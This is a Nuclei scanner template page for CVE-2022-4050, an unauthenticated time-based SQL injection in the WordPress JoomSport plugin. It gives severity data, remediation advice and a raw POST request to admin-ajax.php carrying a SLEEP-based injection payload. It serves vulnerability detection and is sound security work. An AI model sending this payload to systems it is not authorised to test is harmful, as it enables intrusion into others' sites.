Skip to content
Nuclei Templates

WordPress JoomSport <5.2.8 - SQL Injection

ID: CVE-2022-4050

Severity: critical

Author: theamanrawat

Tags: time-based-sqli,cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev

Description

Section titled “Description”

WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.

YAML Source

Section titled “YAML Source”
id: CVE-2022-4050


info:
  name: WordPress JoomSport <5.2.8 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
  impact: |
    An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Update to JoomSport plugin version 5.2.8 or later.
  reference:
    - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f
    - https://wordpress.org/plugins/joomsport-sports-league-results-management/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4050
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4050
    cwe-id: CWE-89
    epss-score: 0.04713
    epss-percentile: 0.92631
    cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: beardev
    product: joomsport
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev


http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(7))aaaa);--+-"}


    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "jscaruselcont jsview2")'
        condition: and
# digest: 4b0a0048304602210095e433f2a8fe6085d181527208d2ace4a0bf53b714905418c609798a7d127487022100e7ba028db599aab21a97543c2d3a5bb71fdab72e008777ac6b7463356a1c88aa:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4050.yaml"

View on Github